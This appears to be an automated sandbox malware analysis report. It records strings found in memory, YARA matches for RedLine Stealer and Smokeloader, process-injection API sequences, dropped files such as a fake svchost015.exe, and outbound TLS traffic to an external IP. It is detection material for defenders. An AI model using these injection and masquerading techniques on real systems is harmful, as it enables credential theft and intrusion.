            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: https://www.ssl.com/repository0
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: https://www.x-ways.net/winhex/forum/
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownHTTPS traffic detected: 191.96.144.157:443 -> 192.168.2.4:49763 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: Yara matchFile source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 8.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: D931.exe PID: 7888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost015.exe PID: 7940, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

            System Summary

            barindex
            Source: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00402F55 RtlCreateUserThread,NtTerminateProcess,0_2_00402F55
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401493
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401476
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014D5
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014AA
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014AD
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014B1
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004030B2 NtTerminateProcess,0_2_004030B2
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00402F55 RtlCreateUserThread,NtTerminateProcess,5_2_00402F55
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401493
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401476
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014D5
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014AA
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014AD
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014B1
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_004030B2 NtTerminateProcess,5_2_004030B2
            Source: C:\Users\user\AppData\Local\Temp\D931.exeCode function: 7_2_030AA090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_030AA090
            Source: C:\Users\user\AppData\Local\Temp\D931.exeCode function: 7_2_030A96B0 NtProtectVirtualMemory,NtProtectVirtualMemory,7_2_030A96B0
            Source: C:\Users\user\AppData\Local\Temp\D931.exeCode function: 7_2_030A93F0 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,7_2_030A93F0
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401C5E0_2_00401C5E
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401C0A0_2_00401C0A
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A154D0_2_004A154D
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1C710_2_004A1C71
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_004A1CC50_2_004A1CC5
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00401C5E5_2_00401C5E
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_00401C0A5_2_00401C0A
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_005B154D5_2_005B154D
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_005B1C715_2_005B1C71
            Source: C:\Users\user\AppData\Roaming\busaafdCode function: 5_2_005B1CC55_2_005B1CC5
            Source: C:\Users\user\AppData\Local\Temp\D931.exeCode function: 7_2_030AA7007_2_030AA700
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\D931.exe 681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\svchost015.exe 7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
            Source: e0OOofAl0S.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: e0OOofAl0S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: busaafd.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: svchost015.exe.7.drBinary string: \Device\CDROM
            Source: svchost015.exe.7.drBinary string: \Device\PhysicalMemory
            Source: svchost015.exe.7.drBinary string: \Device\PhysicalMemoryU
            Source: svchost015.exe.7.drBinary string: ol, por favorI&taliano, per favore&Portugues, por favorPo&lski*.*.prj.xfcwhxvmem.pos.settings.zip.e01.dd001.ctr.txt.png.mem.memservice_workeredgetmp.tmpemlmsg.jpgheic*.pdf;*.ps;*.tif;*.jpg;*.png;*.gif;*.bmp.htmlhtmlxmlsqlitesqlitedbregistryolk14messageedbsnssevtevtxplistbplist*.xhdTesseractOCRExcireExcire ForensicsExcire.exe.\!imagespst,ost,edb,dbx,pfc,mbox,eml,emlx,mht,mim,msg,olk14msgsource,olk14message,olk14msgattach,olk15msgattach,olk15msgsource,olk15message,oft,mbs,tnefzip,zipx,7z,rar,tar,gz,tgz,bzip,bz2docx,xlsx,pptx,ppsx,odt,ods,odb,odg,odf,odp,key,numbers,pages,xps,oxps,opendoc,sxw,sxg,sxc,stc,sxm,sxi,sxd,std,stw,sxm,hwpxufdr,ova,gbp,odm,a2w,kmz,kpr,pxl2,bbb,idml,cdr,sbb,notebook,mmap,spd,cdmz,mwb,nbak,pez,artx,cmap,sh3d,dpp,snb,dbk,sps,spv,wpp,jnxthmx,war,otp,xap,dwfx,epub,btapp,u3p,nth,ibooks,3dxml,htmlz,cbz,ear,potx,ppam,xltx,xlsm,dotx,docm,dotx,vsdx,gadget,rbf,eftx,gg,ottjar,apk,ipa,appx,crx,cabzxp,ots,wmz,air,accft,vssx,ipcc,ipsw,xpi;*.docx;*.pptx;*.xlsx;*.vsdx;*.vsdm;*.odt;*.odp;*.ods*.xls;*.xlsx;*.odsNEARNTNRFlexFilterANDOR (=offline)XWF_MTX_Alt Gr +Ctrl +Shift +Space +Ctrl+Alt +HeaderBlank line(s) found.Power down after x minutesFallback code page for plain text*\\\\?\\\.\\\?\Volume{\Device\HarddiskVolume\Device\CdRom... .. FILEBAAD($MFT) WofCompressedDataIndex Record$EFS.PFILENTFS: EA(EA)NO NAME > 0x100x10 < 0x30Unable to terminate worker thread.X-Ways Decompressed [block hash values] [PhotoDNA] [FuzZyDoc]PhotoDNAFuzZyDoc_newTeamsMessagesDataTeamsMeetingsRecoverable Items\DeletionsTop of Personal FoldersSenRec.dirPasswords.txtSearch Terms.txtNewUsers.dirKeywordsLockSpecial Interest.sectorX-Ways SessionSleep(0) Frequency (0..100)non-existent sector debug info123123|123|1234|12345|123456|1234567|12345678|123456789|987654321|abc123|123abc|121212|000000|666666|qwerty|password|password1|iloveyou|monkey|dragon|qwertyuiop-------- *** ---*** ***nLicID& --> --> .journal.exclude.badblocksFile mode:Sequential #TOCBLOCKVMDBVBLKContainerFILETIMEZone.Identifier[ZoneTransfer]System Volume InformationNot enough space for metadata at offset<html>
            Source: svchost015.exe.7.drBinary string: \Device\harddisk
            Source: svchost015.exe.7.drBinary string: \Device\Floppy
            Source: svchost015.exe.7.drBinary string: \Device\Floppy\Device\CDROM\Device\harddisk\partition0SQ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@6/4@9/3
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_005373AE CreateToolhelp32Snapshot,Module32First,0_2_005373AE
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\busaafdJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D931.tmpJump to behavior
            Source: Yara matchFile source: 8.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
            Source: e0OOofAl0S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\D931.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
            Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: e0OOofAl0S.exeVirustotal: Detection: 43%
            Source: unknownProcess created: C:\Users\user\Desktop\e0OOofAl0S.exe "C:\Users\user\Desktop\e0OOofAl0S.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\busaafd C:\Users\user\AppData\Roaming\busaafd
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D931.exe C:\Users\user\AppData\Local\Temp\D931.exe
            Source: C:\Users\user\AppData\Local\Temp\D931.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D931.exe C:\Users\user\AppData\Local\Temp\D931.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exeJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\busaafdSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D931.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeUnpacked PE file: 0.2.e0OOofAl0S.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Roaming\busaafdUnpacked PE file: 5.2.busaafd.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00403245 push eax; ret 0_2_00403276
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00403265 push eax; ret 0_2_00403276
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_00401C0A pushad ; iretd 0_2_00401C5C
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeCode function: 0_2_0040321E push eax; ret 0_2_00403276
